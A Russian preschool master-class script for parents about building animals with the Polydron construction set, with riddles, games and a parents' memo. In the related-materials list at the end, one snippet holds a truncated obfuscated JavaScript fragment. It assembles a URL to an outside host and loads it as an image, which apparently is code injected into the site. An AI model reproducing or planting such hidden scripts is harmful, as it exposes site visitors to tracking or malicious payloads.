Мастер-класс для родителей «Использование конструктора «Полидрон» в образовательной работе с дошкольниками»
материал (младшая группа)

Солнышкова Екатерина Алексеевна

Раскрытие возможностей использования конструктора «Полидрон» с детьми 3-4 лет для развития конструкторских и познавательных способностей.

Скачать:

ВложениеРазмер
Файл master_klass_dlya_roditeley.docx857 КБ

Предварительный просмотр:

Мастер-класс для родителей

«Использование конструктора «Полидрон» в образовательной работе с дошкольниками»

   

 

Цель: раскрыть возможности использования конструктора «Полидрон» с детьми 3-4 лет для развития конструкторских и познавательных способностей.

Задачи:

- обучать участников мастер-класса навыкам строительства с помощью конструктора «Полидрон»;

- показать участникам мастер-класса возможности использования игр с конструктором «Полидрон»;

- формировать у участников мастер-класса мотивацию на использование конструкторов в самостоятельной деятельности.  

Оборудование и материалы: конструктор «Полидрон», интерактивная доска, презентация, картотека схем и образцов построек.

Ход мастер-класса

Воспитатель: Добрый день, уважаемые родители и дети! Сегодня на нашем мастер-классе мы окунемся в мир «Полидрона». Я хотела бы поделиться своим опытом работы по организации детской деятельности с применением конструктора «Полидрон». Но что такое «Полидрон»?

Это такой веселый конструктор «Полидрон-дракон». Давайте его вместе позовем. А вот и он.

Воспитатель выносит «Полидрон», соединенный в цепь (голова и хвост).

Воспитатель (за Дракона): Здравствуйте, взрослые и дети. Я настоящий живой дракон «Полидрон» и пришел я к вам из сказочной страны «Полидронии». У меня есть волшебный хвост, который может трансформироваться и превращаться в различных животных.

- Хотите посмотреть волшебные превращения моего хвоста?

Дети и родители: Да.

Воспитатель: Но для этого мне нужны три помощника. Какая семья поможет мне первой?

На сцену выходит одна или две семьи.

А сейчас мой хвост начинает превращаться, превращаться. Отгадайте в кого?

Ползает наоборот

Задом наперед

Все под водой

Хватает клешней

На слайде картинка рака.

https://fs00.infourok.ru/images/doc/230/63268/2/img23.jpg

Правильно, рак.

Помощники, соберите рака.

Родители с детьми конструируют.

Схема-помощник

https://academic-store.ru/image/cache/catalog/doshkol/80-1010_9-800x800.jpg

А чтобы нам не было скучно, давайте поиграем со зрителями:

Найдите ваши ушки.

Найдите ваши ножки.

Найдите ваши щечки.

Покажите ладошки.

Покажите кулачки.

А теперь быстрее.

Найдите ваши ушки.

Найдите ваши ножки.

Найдите ваши щечки.

Покажите ладошки.

Покажите кулачки.

Воспитатель: Итак, получился у вас рак? Спасибо. Замечательно.

Воспитатель (за рака): Я рак, не просто так, своими клешнями я все собираю и мамочку свою всегда обнимаю.

А вы дети обнимаете свою мамочку? Покажите как?

Родители обнимаются с детьми.

Воспитатель: А теперь наш рак превратиться в новое животное, но нам нужны помощники. Кто поможет?

Воспитатель вызывает другие две семьи.

Воспитатель: Отгадайте в какое животное превратиться рак:

Кто с рогами и хвостом

Пахнет теплым молоком

Кто мычит, наевшись травки

Возле дома у канавки?

Кто под вечер нам парного

Молока дает?

На слайде картинка: корова.

https://fs01.infourok.ru/images/doc/88/105097/img4.jpg

Воспитатель: Правильно, корова.

Помощники, соберите корову.

Схема подсказка

https://academic-store.ru/image/cache/catalog/doshkol/80-1010_8-800x800.jpg

Родители с детьми конструируют.

А чтобы нам не было скучно, давайте поиграем со зрителями:

Коровушка, коровушка (воспитатель изображает рожки у головы)

Рогатая головушка,

Малых деток не бодай! (раскачивается в стороны)

Молочка им лучше дай!» (два кулачка подносит ко рту)

Воспитатель: Ну, как у нас получилась корова?

Участники мастер класса демонстрируют конструкцию.

Воспитатель: Замечательная корова получилась. Давайте теперь поиграем с коровкой.

Воспитатель: Правила игры таковы: дети становятся в круг. Мы будем вести хоровод, приговаривая: «Коровушка, коровушка, дай нам молока!», а кто-нибудь один из вас будет коровушкой и в это время будет стоять в центре круга с закрытыми глазками и, когда ребята закончат приговаривать, скажет: «Молоко я дам тому, кого я угадать смогу». После этого все заканчивают водить хоровод и на кого из вас я покажу пальчиком, тот попытается изменить голосочек и сказать: «Му-у». Если коровушка отгадает кто это сказал, то коровушкой становится тот, кого отгадали.

Воспитатель играет с детьми.

А пока мы будем играть,

Родителям не дадим скучать.

И попросим их нам замок собрать.

Родители конструируют замок, воспитатель играет с детьми.

Воспитатель: Как родители, у вас замок для нас готов? Да тут и ворота есть.

Мы сейчас с детьми по очереди в замок пройдем и подарок себе найдем.

Дети по цепочке проходят сквозь ворота замка, воспитатель вручает каждому ребенку бумажный цветок.

Воспитатель: Дети, вам понравился наш мастер-класс? Кому понравился, помашите цветочками.

Дети машут.

Воспитатель: А для вас родители мы приготовили памятки о роли конструирования в развитии детей.

Воспитатель раздает памятки.

Уважаемые родители, прошу поделиться своими впечатлениями о нашем мастер-классе.

Высказывания родителей.

А теперь проверим ваше настроение.

Зеленый - понравился мастер-класс.

Желтый - неплохо было.

Красный - ничего не поняли, было сложно.

Родители и дети называют.

Спасибо всем за участие в Мастер-классе!  


Приложение

Памятка для родителей

«Роль конструктора в развитии дошкольников»

Благодаря конструированию быстро совершенствуются навыки и умения ребенка, его умственное и эстетическое развитие. У детей с хорошо развитыми навыками в конструировании быстрее развивается речь, так как тонкая моторика связана с центрами речи. Ловкие, точные движения рук дают ребенку возможность в дальнейшем быстрее и лучше овладеть техникой письма.

Основной материал для конструирования - строительный. Дети знакомятся с ним, выясняется отличие деталей, в каком положении он наиболее устойчив: когда стоит вертикально или лежит. Дети усваивают название, пользуются им в игре, учатся различать цвета. Также дети знакомятся со свойствами материала, учатся делать из них различные поделки. Использование в работе конструктора Полидрон развивает умение увидеть в привычных вещах необычное.

Дети учатся сохранять порядок на своем рабочем месте: раскладывают строительный материал на столах в том порядке, в каком показал воспитатель. По окончании занятий и игр разбирают постройку, укладывают материал на столе в том порядке, в каком он находился перед занятием.

Соберите вместе с детьми:

Собачка                                        Верблюд

https://academic-store.ru/image/cache/catalog/doshkol/80-1010_13-800x800.jpg https://academic-store.ru/image/cache/catalog/doshkol/80-1010_12-800x800.jpg

Велосипед                                   Корова

https://academic-store.ru/image/cache/catalog/doshkol/80-1010_3-800x800.jpg    https://academic-store.ru/image/cache/catalog/doshkol/80-1010_8-800x800.jpg

Ослик                                                  Человечек

https://images.ru.prom.st/440853024_w640_h640_nabor-polidron-gigant.jpg  https://zapsibtorg72.ru/upload/iblock/fa6/fa668b4e17810bf3132a71affc377f45.jpg


По теме: методические разработки, презентации и конспекты

Мастер-класс для педагогов района «Использование метода песочной терапии в работе с дошкольниками с особыми образовательными потребностями».

Презентация, содержание мастер-класса, описание игр и упражнений в песочнице, на световом столе, с кинетическим песком....

мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста,  формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....

Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"

Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...

МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...

Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»

В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых пед...